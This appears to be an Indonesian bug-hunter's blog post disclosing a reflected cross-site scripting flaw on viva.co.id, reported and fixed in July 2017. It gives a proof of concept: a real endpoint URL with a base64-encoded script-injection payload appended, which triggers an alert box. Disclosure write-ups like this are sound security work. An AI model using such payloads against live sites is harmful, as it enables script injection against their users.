Viva.co.id | Bug Xss On Viva.co.id

How I Find This Bug Xss In Viva.co.id Hay Guys Ini Postingan Sekaligus Perjalanan Bug Hunter saya Nih Hehe.. Curhat Dikit. Oke Langsung Aja, Di Bawah Ini ada POC Bagai Mana Saya Menemukan Bug Xss (CROSS-SITE-SCRIPTING) di Viva.co.id
  POC :
 1. Gunakan Url : http://log.viva.co.id/frame/read/
2. Script Xss Yang Udah Di Encrpy Base64 :
 Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik7IDwvc2NyaXB0Pg==
3. Kita Tempel Di Belakang Url jadi : http://log.viva.co.id/frame/read/Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik7IDwvc2NyaXB0Pg==
4. Setelah Itu Tempel di Address Bar Lalu Enter Tara.. Jreng.… jreng… jreng… Muncul Tuh Kotak Alert Dan Sangat Di Sayangkan Guys Website dalam Negri Jarang Kasih Bounty Reward :'( Udah Capek" Kan Cari Bug Malah Dapet Terima Kasih :'(


• 20 juli 2017 - Bug Report
• 20 juli 2017 - Bug Confirm And Prosses Fixed • 23 Juli 2017 - Owner Tanya Apa Anda Mau bergabung Bersama Viva.co.id Developers
• 24 Juli 2017 - Saya Balas Apa Viva.co.id Memberikan Bug Bounty Reward
• 24 Juli 2017 - Owner Bilang Mohon Maaf Kami Tidak Mengadakan Bounty Reward

Comments

Post a Comment

Popular posts from this blog

Bug Tirto.id | Bug Di Situs Berita Tirto.id

Bug tokopedia.com | Bagaimana saya mendapatkan 3jt untuk xss tokopedia.com

Bug Tokopedia.com | Bug Bypass OTP on Tokopedia.com